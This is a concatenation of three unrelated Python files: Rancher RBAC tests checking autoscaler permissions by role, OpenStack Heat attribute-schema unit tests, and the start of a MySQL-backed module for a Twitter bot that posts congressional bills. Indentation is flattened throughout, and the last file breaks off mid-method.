(CLUSTER_MEMBER),
]
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_create(role, remove_resource):
user_project = None
if(role == CLUSTER_MEMBER):
user_token = rbac_get_user_token_by_role(CLUSTER_MEMBER)
user_project, ns = create_project_and_ns(user_token,
namespace["cluster"],
random_test_name(
"cluster-mem"))
p_client = get_project_client_for_token(user_project, user_token)
else:
user_token = rbac_get_user_token_by_role(role)
project = rbac_get_project()
ns = rbac_get_namespace()
p_client = get_project_client_for_token(project, user_token)
if (role != PROJECT_READ_ONLY):
newhpa, newworkload = create_hpa(p_client, ns)
remove_resource(newhpa)
remove_resource(newworkload)
else:
project = rbac_get_project()
ns = rbac_get_namespace()
user_token = rbac_get_user_token_by_role(PROJECT_READ_ONLY)
readonly_user_client = get_project_client_for_token(project,
user_token)
# Verify Read Only member cannot create hpa objects
with pytest.raises(ApiError) as e:
create_hpa(readonly_user_client, ns)
assert e.value.error.status == 403
assert e.value.error.code == 'Forbidden'
if(user_project is not None):
remove_resource(user_project)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_create_negative(role, remove_resource):
if (role == CLUSTER_OWNER):
print(role)
unshared_project = rbac_get_unshared_project()
ns = rbac_get_unshared_ns()
user_token = rbac_get_user_token_by_role(role)
p_client = get_project_client_for_token(unshared_project, user_token)
hpa, workload = create_hpa(p_client, ns)
remove_resource(hpa)
remove_resource(workload)
else:
unshared_project = rbac_get_unshared_project()
ns = rbac_get_unshared_ns()
cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
owner_client = get_project_client_for_token(unshared_project,
cluster_owner_token)
# Workload created by cluster owner in unshared project is passed as
# parameter to create HPA
workload = create_workload(owner_client, ns)
user_token = rbac_get_user_token_by_role(role)
p_client = get_project_client_for_token(unshared_project, user_token)
with pytest.raises(ApiError) as e:
create_hpa(p_client, ns, workload=workload)
assert e.value.error.status == 403
assert e.value.error.code == 'Forbidden'
remove_resource(workload)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_edit(role, remove_resource):
if (role == PROJECT_READ_ONLY):
verify_hpa_project_readonly_edit(remove_resource)
elif(role == CLUSTER_MEMBER):
verify_hpa_cluster_member_edit(remove_resource)
else:
user_token = rbac_get_user_token_by_role(role)
project = rbac_get_project()
ns = rbac_get_namespace()
p_client = get_project_client_for_token(project, user_token)
hpa, workload = edit_hpa(p_client, ns)
remove_resource(hpa)
remove_resource(workload)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_edit_negative(role, remove_resource):
if (role == CLUSTER_OWNER):
unshared_project = rbac_get_unshared_project()
ns = rbac_get_unshared_ns()
user_token = rbac_get_user_token_by_role(role)
p_client = get_project_client_for_token(unshared_project, user_token)
hpa, workload = edit_hpa(p_client, ns)
remove_resource(hpa)
remove_resource(workload)
else:
unshared_project = rbac_get_unshared_project()
user_token = rbac_get_user_token_by_role(role)
unshared_ns = rbac_get_unshared_ns()
user_client = get_project_client_for_token(unshared_project,
user_token)
cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
# Cluster owner client created in the unshared project
cluster_owner_p_client = \
get_project_client_for_token(unshared_project, cluster_owner_token)
# Verify that some users cannot edit hpa created by cluster owner
verify_edit_forbidden(user_client, remove_resource,
cluster_owner_client=cluster_owner_p_client,
ns=unshared_ns)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_delete(role, remove_resource):
user_project = None
if(role == CLUSTER_MEMBER):
user_token = rbac_get_user_token_by_role(CLUSTER_MEMBER)
user_project, ns = create_project_and_ns(user_token,
namespace["cluster"],
random_test_name(
"cluster-mem"))
p_client = get_project_client_for_token(user_project, user_token)
else:
user_token = rbac_get_user_token_by_role(role)
project = rbac_get_project()
ns = rbac_get_namespace()
p_client = get_project_client_for_token(project, user_token)
if (role != PROJECT_READ_ONLY):
hpa, workload = create_hpa(p_client, ns)
delete_hpa(p_client, hpa, ns)
remove_resource(workload)
remove_resource(hpa)
if user_project is not None:
remove_resource(user_project)
if (role == PROJECT_READ_ONLY):
project = rbac_get_project()
ns = rbac_get_namespace()
cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
cluster_owner_p_client = \
get_project_client_for_token(project, cluster_owner_token)
user_token = rbac_get_user_token_by_role(PROJECT_READ_ONLY)
user_client = get_project_client_for_token(project, user_token)
# As a Cluster owner create a HPA object
hpa, workload = create_hpa(cluster_owner_p_client, ns)
# Verify that the Read Only member cannot delete the HPA objects
# created by Cluster Owner
with pytest.raises(ApiError) as e:
delete_hpa(user_client, hpa, ns)
assert e.value.error.status == 403
assert e.value.error.code == 'Forbidden'
remove_resource(hpa)
remove_resource(workload)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_delete_negative(role, remove_resource):
if (role == CLUSTER_OWNER):
print(role)
unshared_project = rbac_get_unshared_project()
ns = rbac_get_unshared_ns()
user_token = rbac_get_user_token_by_role(role)
p_client = get_project_client_for_token(unshared_project, user_token)
hpa, workload = create_hpa(p_client, ns)
delete_hpa(p_client, hpa, ns)
remove_resource(hpa)
remove_resource(workload)
else:
unshared_project = rbac_get_unshared_project()
ns = rbac_get_unshared_ns()
cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
owner_client = get_project_client_for_token(unshared_project,
cluster_owner_token)
workload = create_workload(owner_client, ns)
user_token = rbac_get_user_token_by_role(role)
# Workload created by cluster owner in unshared project is passed as
# parameter to create HPA
hpa, workload = create_hpa(owner_client, ns, workload=workload)
p_client = get_project_client_for_token(unshared_project, user_token)
with pytest.raises(ApiError) as e:
delete_hpa(p_client, hpa, ns)
assert e.value.error.status == 403
assert e.value.error.code == 'Forbidden'
remove_resource(hpa)
remove_resource(workload)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_list(remove_resource, role):
user_project = None
if(role == CLUSTER_MEMBER):
cluster_member_token = rbac_get_user_token_by_role(CLUSTER_MEMBER)
user_project, ns = \
create_project_and_ns(cluster_member_token,
namespace["cluster"],
random_test_name("cluster-mem"))
user_client = get_project_client_for_token(user_project,
cluster_member_token)
# As a cluster member create a HPA and he should be able to list it
hpa, workload = create_hpa(user_client, ns)
else:
cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
project = rbac_get_project()
cluster_owner_p_client = \
get_project_client_for_token(project, cluster_owner_token)
user_token = rbac_get_user_token_by_role(role)
project = rbac_get_project()
ns = rbac_get_namespace()
user_client = get_project_client_for_token(project, user_token)
hpa, workload = create_hpa(cluster_owner_p_client, ns)
hpaname = hpa.name
hpadict = user_client.list_horizontalPodAutoscaler(name=hpaname)
print(hpadict)
hpadata = hpadict.get('data')
assert len(hpadata) == 1
assert hpadata[0].type == "horizontalPodAutoscaler"
assert hpadata[0].name == hpaname
remove_resource(hpa)
remove_resource(workload)
if user_client is not None:
remove_resource(user_project)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_list_negative(remove_resource, role):
if (role == CLUSTER_OWNER):
unshared_project = rbac_get_unshared_project()
ns = rbac_get_unshared_ns()
user_token = rbac_get_user_token_by_role(role)
p_client = get_project_client_for_token(unshared_project, user_token)
hpa, workload = create_hpa(p_client, ns)
hpaname = hpa.name
hpadict = p_client.list_horizontalPodAutoscaler(name=hpaname)
hpadata = hpadict.get('data')
assert len(hpadata) == 1
assert hpadata[0].type == "horizontalPodAutoscaler"
assert hpadata[0].name == hpaname
remove_resource(hpa)
remove_resource(workload)
else:
cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
unshared_project = rbac_get_unshared_project()
ns = rbac_get_unshared_ns()
cluster_owner_client = \
get_project_client_for_token(unshared_project, cluster_owner_token)
user_token = rbac_get_user_token_by_role(role)
user_client = get_project_client_for_token(unshared_project,
user_token)
hpa, workload = create_hpa(cluster_owner_client, ns)
hpaname = hpa.name
# Verify length of HPA list is zero
hpadict = user_client.list_horizontalPodAutoscaler(name=hpaname)
hpadata = hpadict.get('data')
assert len(hpadata) == 0
remove_resource(hpa)
remove_resource(workload)
def verify_hpa_cluster_member_edit(remove_resource):
cluster_member_token = rbac_get_user_token_by_role(CLUSTER_MEMBER)
user_project, ns = create_project_and_ns(cluster_member_token,
namespace["cluster"],
random_test_name("cluster-mem"))
cluster_member_client = get_project_client_for_token(user_project,
cluster_member_token)
# Verify the cluster member can edit the hpa he created
hpa, workload = edit_hpa(cluster_member_client, ns)
# Verify that cluster member cannot edit the hpa created by cluster owner
verify_edit_forbidden(cluster_member_client, remove_resource)
remove_resource(hpa)
remove_resource(workload)
remove_resource(user_project)
def verify_hpa_project_readonly_edit(remove_resource):
project = rbac_get_project()
user_token = rbac_get_user_token_by_role(PROJECT_READ_ONLY)
readonly_user_client = get_project_client_for_token(project, user_token)
# Verify that read -only user cannot edit the hpa created by cluster owner
verify_edit_forbidden(readonly_user_client, remove_resource)
def verify_edit_forbidden(user_client, remove_resource,
cluster_owner_client=None, ns=None):
metrics = [{
'name': 'cpu',
'type': 'Resource',
'target': {
'type': 'Utilization',
'utilization': '50',
},
}]
if(cluster_owner_client is None and ns is None):
project = rbac_get_project()
ns = rbac_get_namespace()
cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
cluster_owner_client = \
get_project_client_for_token(project, cluster_owner_token)
# Create HPA as a cluster owner
hpa, workload = create_hpa(cluster_owner_client, ns)
# Verify editing HPA fails
with pytest.raises(ApiError) as e:
user_client.update(hpa,
name=hpa['name'],
namespaceId=ns.id,
maxReplicas=10,
minReplicas=3,
workload=workload.id,
metrics=metrics)
assert e.value.error.status == 403
assert e.value.error.code == 'Forbidden'
remove_resource(hpa)
remove_resource(workload)
def create_hpa(p_client, ns, workload=None):
# Create workload of scale 1 with CPU reservation
# Create hpa pointing to the workload.
if workload is None:
workload = create_workload(p_client, ns)
name = random_test_name("hpa")
metrics = [{'name': 'cpu',
'type': 'Resource',
'target': {
'type': 'Utilization',
'utilization': '50',
},
}]
hpa = p_client.create_horizontalPodAutoscaler(
name=name,
namespaceId=ns.id,
maxReplicas=5,
minReplicas=2,
workloadId=workload.id,
metrics=metrics
)
hpa = wait_for_hpa_to_active(p_client, hpa)
assert hpa.type == "horizontalPodAutoscaler"
assert hpa.name == name
assert hpa.minReplicas == 2
assert hpa.maxReplicas == 5
# After hpa becomes active, the workload scale should be equal to the
# minReplicas set in HPA object
workloadlist = p_client.list_workload(uuid=workload.uuid).data
validate_workload(p_client, workloadlist[0], "deployment", ns.name,
pod_count=hpa.minReplicas)
return (hpa, workload)
def edit_hpa(p_client, ns):
# Create workload of scale 1 with memory reservation
# Create hpa pointing to the workload.Edit HPA and verify HPA is functional
workload = create_workload(p_client, ns)
name = random_test_name("default")
metrics = [{
"type": "Resource",
"name": "memory",
"target": {
"type": "AverageValue",
"value": None,
"averageValue": "32Mi",
"utilization": None,
"stringValue": "32"
}
}]
hpa = p_client.create_horizontalPodAutoscaler(
name=name,
namespaceId=ns.id,
maxReplicas=4,
minReplicas=2,
workloadId=workload.id,
metrics=metrics
)
wait_for_hpa_to_active(p_client, hpa)
# After hpa becomes active, the workload scale should be equal to the
# minReplicas set in HPA
workloadlist = p_client.list_workload(uuid=workload.uuid).data
validate_workload(p_client, workloadlist[0], "deployment", ns.name,
pod_count=hpa.minReplicas)
# Edit the HPA
updated_hpa = p_client.update(hpa,
name=hpa['name'],
namespaceId=ns.id,
maxReplicas=6,
minReplicas=3,
workloadId=workload.id,
metrics=metrics)
wait_for_hpa_to_active(p_client, updated_hpa)
assert updated_hpa.type == "horizontalPodAutoscaler"
assert updated_hpa.minReplicas == 3
assert updated_hpa.maxReplicas == 6
# After hpa becomes active, the workload scale should be equal to the
# minReplicas set in the updated HPA
wait_for_pods_in_workload(p_client, workload, 3)
workloadlist = p_client.list_workload(uuid=workload.uuid).data
validate_workload(p_client, workloadlist[0], "deployment", ns.name,
pod_count=updated_hpa.minReplicas)
return (updated_hpa, workload)
def delete_hpa(p_client, hpa, ns):
hpaname = hpa['name']
p_client.delete(hpa)
# Sleep to allow HPA to be deleted
time.sleep(5)
timeout = 30
hpadict = p_client.list_horizontalPodAutoscaler(name=hpaname)
print(hpadict.get('data'))
start = time.time()
if len(hpadict.get('data')) > 0:
testdata = hpadict.get('data')
while hpaname in testdata[0]['data']:
if time.time() - start > timeout:
raise AssertionError("Timed out waiting for deletion")
time.sleep(.5)
hpadict = p_client.list_horizontalPodAutoscaler(name=hpaname)
testdata = hpadict.get('data')
assert True
if len(hpadict.get('data')) == 0:
assert True
# Verify hpa is deleted by "kubectl get hpa" command
command = "get hpa {} --namespace {}".format(hpa['name'], ns.name)
print("Command to obtain the hpa")
print(command)
result = execute_kubectl_cmd(command, json_out=False, stderr=True)
print(result)
print("Verify that the hpa does not exist "
"and the error code returned is non zero ")
if result != 0:
assert True
def create_workload(p_client, ns):
con = [{"name": "test1",
"image": TEST_IMAGE,
"resources": {
"requests": {
"memory": "64Mi",
"cpu": "100m"
},
"limits": {
"memory": "512Mi",
"cpu": "1000m"
}
}
}]
name = random_test_name("workload")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
print(workload.scale)
validate_workload(p_client, workload, "deployment", ns.name)
return workload
@pytest.fixture(scope='module', autouse="True")
def create_project_client(request):
client, cluster = get_user_client_and_cluster()
create_kubeconfig(cluster)
p, ns = create_project_and_ns(
ADMIN_TOKEN, cluster, random_test_name("testhpa"))
p_client = get_project_client_for_token(p, ADMIN_TOKEN)
namespace["p_client"] = p_client
namespace["ns"] = ns
namespace["cluster"] = cluster
namespace["project"] = p
def fin():
client = get_admin_client()
client.delete(namespace["project"])
request.addfinalizer(fin)
| |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
from heat.engine import attributes
from heat.engine import resources
from heat.engine import support
from heat.tests import common
class AttributeSchemaTest(common.HeatTestCase):
def test_schema_all(self):
d = {'description': 'A attribute'}
s = attributes.Schema('A attribute')
self.assertEqual(d, dict(s))
d = {'description': 'Another attribute',
'type': 'string'}
s = attributes.Schema('Another attribute',
type=attributes.Schema.STRING)
self.assertEqual(d, dict(s))
def test_all_resource_schemata(self):
for resource_type in resources.global_env().get_types():
for schema in six.itervalues(getattr(resource_type,
'attributes_schema',
{})):
attributes.Schema.from_attribute(schema)
def test_from_attribute_new_schema_format(self):
s = attributes.Schema('Test description.')
self.assertIs(s, attributes.Schema.from_attribute(s))
self.assertEqual('Test description.',
attributes.Schema.from_attribute(s).description)
s = attributes.Schema('Test description.',
type=attributes.Schema.MAP)
self.assertIs(s, attributes.Schema.from_attribute(s))
self.assertEqual(attributes.Schema.MAP,
attributes.Schema.from_attribute(s).type)
def test_schema_support_status(self):
schema = {
'foo_sup': attributes.Schema(
'Description1'
),
'bar_dep': attributes.Schema(
'Description2',
support_status=support.SupportStatus(
support.DEPRECATED,
'Do not use this ever')
)
}
attrs = attributes.Attributes('test_rsrc', schema, lambda d: d)
self.assertEqual(support.SUPPORTED,
attrs._attributes['foo_sup'].support_status().status)
self.assertEqual(support.DEPRECATED,
attrs._attributes['bar_dep'].support_status().status)
self.assertEqual('Do not use this ever',
attrs._attributes['bar_dep'].support_status().message)
class AttributeTest(common.HeatTestCase):
"""Test the Attribute class."""
def test_as_output(self):
"""Test that Attribute looks right when viewed as an Output."""
expected = {
"Value": {"Fn::GetAtt": ["test_resource", "test1"]},
"Description": "The first test attribute"
}
attr = attributes.Attribute(
"test1", attributes.Schema("The first test attribute"))
self.assertEqual(expected, attr.as_output("test_resource"))
def test_as_output_hot(self):
"""Test that Attribute looks right when viewed as an Output."""
expected = {
"value": {"get_attr": ["test_resource", "test1"]},
"description": "The first test attribute"
}
attr = attributes.Attribute(
"test1", attributes.Schema("The first test attribute"))
self.assertEqual(expected, attr.as_output("test_resource", "hot"))
class AttributesTest(common.HeatTestCase):
"""Test the Attributes class."""
def setUp(self):
super(AttributesTest, self).setUp()
self.resolver = mock.MagicMock()
self.attributes_schema = {
"test1": attributes.Schema("Test attrib 1"),
"test2": attributes.Schema("Test attrib 2"),
"test3": attributes.Schema(
"Test attrib 3",
cache_mode=attributes.Schema.CACHE_NONE)
}
def test_get_attribute(self):
"""Test that we get the attribute values we expect."""
self.resolver.return_value = "value1"
attribs = attributes.Attributes('test resource',
self.attributes_schema,
self.resolver)
self.assertEqual("value1", attribs['test1'])
self.resolver.assert_called_once_with('test1')
def test_attributes_representation(self):
"""Test that attributes are displayed correct."""
self.resolver.return_value = "value1"
attribs = attributes.Attributes('test resource',
self.attributes_schema,
self.resolver)
msg = 'Attributes for test resource:\n\tvalue1\n\tvalue1\n\tvalue1'
self.assertEqual(msg, str(attribs))
calls = [
mock.call('test1'),
mock.call('test2'),
mock.call('test3')
]
self.resolver.assert_has_calls(calls, any_order=True)
def test_get_attribute_none(self):
"""Test that we get the attribute values we expect."""
self.resolver.return_value = None
attribs = attributes.Attributes('test resource',
self.attributes_schema,
self.resolver)
self.assertIsNone(attribs['test1'])
self.resolver.assert_called_once_with('test1')
def test_get_attribute_nonexist(self):
"""Test that we get the attribute values we expect."""
self.resolver.return_value = "value1"
attribs = attributes.Attributes('test resource',
self.attributes_schema,
self.resolver)
self.assertRaises(KeyError, attribs.__getitem__, 'not there')
self.assertFalse(self.resolver.called)
def test_as_outputs(self):
"""Test that Output format works as expected."""
expected = {
"test1": {
"Value": {"Fn::GetAtt": ["test_resource", "test1"]},
"Description": "Test attrib 1"
},
"test2": {
"Value": {"Fn::GetAtt": ["test_resource", "test2"]},
"Description": "Test attrib 2"
},
"test3": {
"Value": {"Fn::GetAtt": ["test_resource", "test3"]},
"Description": "Test attrib 3"
},
"OS::stack_id": {
"Value": {"Ref": "test_resource"},
}
}
MyTestResourceClass = mock.MagicMock()
MyTestResourceClass.attributes_schema = {
"test1": attributes.Schema("Test attrib 1"),
"test2": attributes.Schema("Test attrib 2"),
"test3": attributes.Schema("Test attrib 3"),
"test4": attributes.Schema(
"Test attrib 4",
support_status=support.SupportStatus(status=support.HIDDEN))
}
self.assertEqual(
expected,
attributes.Attributes.as_outputs("test_resource",
MyTestResourceClass))
def test_as_outputs_hot(self):
"""Test that Output format works as expected."""
expected = {
"test1": {
"value": {"get_attr": ["test_resource", "test1"]},
"description": "Test attrib 1"
},
"test2": {
"value": {"get_attr": ["test_resource", "test2"]},
"description": "Test attrib 2"
},
"test3": {
"value": {"get_attr": ["test_resource", "test3"]},
"description": "Test attrib 3"
},
"OS::stack_id": {
"value": {"get_resource": "test_resource"},
}
}
MyTestResourceClass = mock.MagicMock()
MyTestResourceClass.attributes_schema = {
"test1": attributes.Schema("Test attrib 1"),
"test2": attributes.Schema("Test attrib 2"),
"test3": attributes.Schema("Test attrib 3"),
"test4": attributes.Schema(
"Test attrib 4",
support_status=support.SupportStatus(status=support.HIDDEN))
}
self.assertEqual(
expected,
attributes.Attributes.as_outputs("test_resource",
MyTestResourceClass,
"hot"))
def test_caching_local(self):
self.resolver.side_effect = ["value1", "value1 changed"]
attribs = attributes.Attributes('test resource',
self.attributes_schema,
self.resolver)
self.assertEqual("value1", attribs['test1'])
self.assertEqual("value1", attribs['test1'])
attribs.reset_resolved_values()
self.assertEqual("value1 changed", attribs['test1'])
calls = [
mock.call('test1'),
mock.call('test1')
]
self.resolver.assert_has_calls(calls)
def test_caching_none(self):
self.resolver.side_effect = ["value3", "value3 changed"]
attribs = attributes.Attributes('test resource',
self.attributes_schema,
self.resolver)
self.assertEqual("value3", attribs['test3'])
self.assertEqual("value3 changed", attribs['test3'])
calls = [
mock.call('test3'),
mock.call('test3')
]
self.resolver.assert_has_calls(calls)
class AttributesTypeTest(common.HeatTestCase):
scenarios = [
('string_type',
dict(a_type=attributes.Schema.STRING,
value='correct value',
invalid_value=[])),
('list_type',
dict(a_type=attributes.Schema.LIST,
value=[],
invalid_value='invalid_value')),
('map_type',
dict(a_type=attributes.Schema.MAP,
value={},
invalid_value='invalid_value')),
('integer_type',
dict(a_type=attributes.Schema.INTEGER,
value=1,
invalid_value='invalid_value')),
('boolean_type',
dict(a_type=attributes.Schema.BOOLEAN,
value=True,
invalid_value='invalid_value')),
('boolean_type_string_true',
dict(a_type=attributes.Schema.BOOLEAN,
value="True",
invalid_value='invalid_value')),
('boolean_type_string_false',
dict(a_type=attributes.Schema.BOOLEAN,
value="false",
invalid_value='invalid_value'))
]
def test_validate_type(self):
resolver = mock.Mock()
msg = 'Attribute test1 is not of type %s' % self.a_type
attr_schema = attributes.Schema("Test attribute", type=self.a_type)
attrs_schema = {'res1': attr_schema}
attr = attributes.Attribute("test1", attr_schema)
attribs = attributes.Attributes('test res1', attrs_schema, resolver)
attribs._validate_type(attr, self.value)
self.assertNotIn(msg, self.LOG.output)
attribs._validate_type(attr, self.invalid_value)
self.assertIn(msg, self.LOG.output)
| |
"""
Description:
This program implements a simple Twitter bot that tweets information about bills in Congress
that are (in)directly related to cyber issues. This bot uses a MySQL database backend to
keep track of bills, both posted and unposted (i.e., tweeted and yet to be tweeted, respectively).
For this initial proof of concept, bill data are scraped from the official US Government
Publishing Office website. For future versions, it would probably be better to connect to a
less cumbersome endpoint like ProPublica.
Module:
This module implements the BillDB class.
Libraries:
This program makes use of the following libraries:
lxml
Stephan Richter / Infrae
BSD License
http://lxml.de/
xmltodict
Martin Blech & contribs.
MIT License
https://github.com/martinblech/xmltodict
python-twitter
Mike Taylor ('bear') & contribs.
Apache License 2.0
https://github.com/bear/python-twitter
requests
Kenneth Reitz
Apache License 2.0
http://docs.python-requests.org/en/master
MySQL Connector
Oracle & affiliates
Misc. License
https://dev.mysql.com/doc/connector-python/en/
License:
Copyright 2017 J. Michael Beaver
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
References:
https://www.gpo.gov/fdsys/bulkdata/BILLSTATUS/resources/BILLSTATUS-XML_User-Guide-v1.pdf
https://github.com/usgpo/bill-status/blob/master/BILLSTATUS-XML_User_User-Guide.md
https://projects.propublica.org/api-docs/congress-api/endpoints/
https://github.com/bear/python-twitter
https://github.com/martinblech/xmltodict
http://docs.python-requests.org/en/master
https://dev.mysql.com/doc/connector-python/en/
http://lxml.de/
https://www.python.org/dev/peps/pep-0249
https://is.gd/apishorteningreference.php
https://www.pantz.org/software/mysql/mysqlcommands.html
https://bitbucket.org/ned/coveragepy/commits/f8e9d62f1412
https://www.govtrack.us/api/v2/role
https://choosealicense.com/licenses/apache-2.0/
http://www.mysqltutorial.org/getting-started-mysql-python-connector/
"""
import requests
from dbconfig import read_db_config
from mysql.connector import MySQLConnection, Error
from mysql.connector.cursor import MySQLCursor
class BillDB:
"""Database connection and operations interface.
This class should be used to interface with the database backend.
Any operations that depend on data storage or retrieval should
be achieved using this class.
Attributes:
dbconfig: Database connection configuration information.
conn: MySQL database connector.
cursor: Connector cursor object.
session: Requests session for connecting to websites (e.g., is.gd).
isgdquota: Used to rate limit against the is.gd API.
ISGD_RATE_LIMIT: Constant rate limit set by the is.gd API.
"""
ISGD_RATE_LIMIT = 200 # 200 requests / hour => 4800 requests / day
#-------------------------------------------------------------------------------------------------------------------------------------------------
def __init__(self):
"""Inits the class.
Raises:
Exception: Failure to establish database connection
or a Requests session.
"""
try:
self.dbconfig = read_db_config()
self.conn = MySQLConnection(**self.dbconfig)
self.cursor = self.conn.cursor(buffered=True)
self.session = requests.Session()
self.isgdquota = 0
except Exception as e:
raise Exception(e)
#-------------------------------------------------------------------------------------------------------------------------------------------------
def close(self):
"""Closes database cursor and connection."""
if self.cursor:
self.cursor.close()
if self.conn:
self.conn.close()
#-------------------------------------------------------------------------------------------------------------------------------------------------
def query_fetchmany(self, query, args):
"""Fetches several rows from database based on query.
Args:
query: String with MySQL query.
args: Tuple of arguments for the query.
Returns:
A list of database rows if they were fetched.
If no rows were fetched, an empty list is returned.
Raises:
Exception: Errors in args or in query execution.
"""
def iter_row(size=10):
while True:
rows = self.cursor.fetchmany(size)
if not rows:
break
for row in rows:
yield row
if not isinstance(self.cursor, MySQLCursor):
raise Exception('No database connection!')
if not isinstance(query, basestring):
raise Exception('Invalid query string!')
if not isinstance(args, tuple):
raise Exception('Invalid query args!')
rows = []
try:
self.cursor.execute(query, args)
rows = [row for row in iter_row()]
except Error as e:
raise Exception(e)
return rows
#-------------------------------------------------------------------------------------------------------------------------------------------------
def insert_row(self, info):
"""Inserts a new row into the database.
Args:
info: Dict containing row information.
Returns:
A boolean value. True means the insertion was successful.
False means the insertion failed.
Raises:
Exception: Errors with args or insertion.
"""
if not isinstance(self.cursor, MySQLCursor):
raise Exception('No database connection!')
if not isinstance(info, dict):
raise Exception('Input must be a dict!')
if (('type' not in info) or
('number' not in info) or
('sponsor' not in info) or
('title' not in info) or
('full_url' not in info) or
('introduced' not in info)):
raise Exception('Input missing data!')
query = 'insert into bills(type, number, sponsor, title, full_url, short_url, introduced, updated, posted) ' \
'values(%s, %s, %s, %s, %s, %s, %s, %s, %s)'
args = (
info['type'],
info['number'],
info['sponsor'],
info['title'],
info['full_url'],
info['short_url'] if 'short_url' in info else None,
info['introduced'],
info['updated'] if 'updated' in info else None,
info['posted'] if 'posted' in info else False
)
result = False
try:
self.cursor.execute(query, args)
if self.cursor.rowcount > 0:
result = True
self.conn.commit()
except Error as e:
raise Exception(e)
return result
#-------------------------------------------------------------------------------------------------------------------------------------------------
def row_exists(self, info):
"""Determines if a row already exists in the database.
Args:
info: Dict containing relevant row data.
Returns:
An integer with the row's `id` (as stored in the dabatase)
if the row exists. None value if no row found.
Raises:
Exception: Error in the args or executing the query.
"""
if not isinstance(self.cursor, MySQLCursor):
raise Exception('No database connection!')
if not isinstance(info, dict):
raise Exception('Input must be a dict!')
if (('type' not in info) or
('number' not in info)):
raise Exception('Input missing data!')
query = 'select id, type, number from bills where type=%s and number=%s'
args = (info['type'], info['number'])
row = None
try:
self.cursor.execute(query, args)
row = self.cursor.fetchone()
except Error as e:
raise Exception(e)
return row[0] if row else None
#-------------------------------------------------------------------------------------------------------------------------------------------------
def update_row(self, row_id, info):
"""Updates a row in the table.
Args:
row_id: Integer representing `id` in table row.
info: Dict containing new data.
Returns:
A boolean value. True means successful update.
False means there was a failure.
Raises:
Exception: Error in the args or the query execution.
"""
if not isinstance(self.cursor, MySQLCursor):
raise Exception('No database connection!')
if not isinstance(row_id, int) or row_id < 1:
raise Exception('Invalid row ID!')
if not isinstance(info, dict):
raise Exception('Input must be a dict!')
query = """
update bills
set type = %s,
number = %s,
sponsor = %s,
title = %s,
full_url = %s,
short_url = %s,
introduced = %s,
updated = %s,
posted = %s
where id = %s
"""
args = (
info['type'],
info['number'],
info['sponsor'],
info['title'],
info['full_url'],
info['short_url'] if 'short_url' in info else None,
info['introduced'],
info['updated'] if 'updated' in info else None,
info['posted'] if 'posted' in info else False,
row_id
)
try:
self.cursor.execute(query, args)
if self.cursor.rowcount > 0:
self.conn.commit()
return True
except Error as e:
raise Exception(e)
return False
#-------------------------------------------------------------------------------------------------------------------------------------------------
def has_been_posted(self, row_id):
"""Determines if a given row has `posted` set to True.
Args:
row_id: Integer representing `id` of a table row.
Returns:
The stored value in `posted` (represented as an integer).
Raises:
Exception: Error in the args or the query execution.
"""
if not isinstance(self.cursor, MySQLCursor):
raise Exception('No database connection!')
if not isinstance(row_id, int) or row_id < 1:
raise Exception('Invalid row ID!')
query = 'select posted from bills where id=%s'
args = (row_id,)
row = None
try:
self.cursor.execute(query, args)
row = self.cursor.fetchone()
except Error as e:
raise Exception(e)
return row[0] if row else False
#-------------------------------------------------------------------------------------------------------------------------------------------------
def isgd_shorten(self, url):
"""Shortens a URL using the is.gd API.
Args:
url: The URL to shorten (as a string).
Returns:
A string of the shortened URL on successful shortening.
None value on failure.
Raises:
Exception: Failure stemming from the is.gd API.
"""
data = {'format': 'json',
'url': url,
'logstats': 0}
headers = {'user-agent': 'Mozilla/5.0 (compatible; Python Module)'}
r = self.session.post('http://is.gd/create.php', params=data, headers=headers)
if r.status_code == requests.codes.ok:
d = r.json()
if 'shorturl' in d:
self.isgdquota += 1
return d['shorturl']
else:
self.isgdquota = self.ISGD_RATE_LIMIT
raise Exception('{0}: {1}'.format(d['errorcode'], d['errormessage']))
return None
#-------------------------------------------------------------------------------------------------------------------------------------------------
def gen_short_url(self, row=None):
"""Shortens a row's URL.
Args:
row: Tuple object representing a table row.
Raises:
Exception: Failure to shorten URL.
"""
if not isinstance(self.cursor, MySQLCursor):
raise Exception('No database connection!')
if not isinstance(row, tuple):
raise Exception('Input must be a tuple!')
if row and self.isgdquota < self.ISGD_RATE_LIMIT:
info = self.tuple_to_dict(row)
short_url = None
try:
short_url = self.isgd_shorten(info['full_url'])
info['short_url'] = short_url
except Exception as e:
raise Exception(e)
finally:
if short_url: self.update_row(info['id'], info)
#-------------------------------------------------------------------------------------------------------------------------------------------------
def rows_to_shorten(self):
"""Returns a list of rows whose URLs need to be shortened.
Returns:
List of rows (in tuple representation) or empty
list if no rows found.
Raises:
Exception: Failure in query execution.
"""
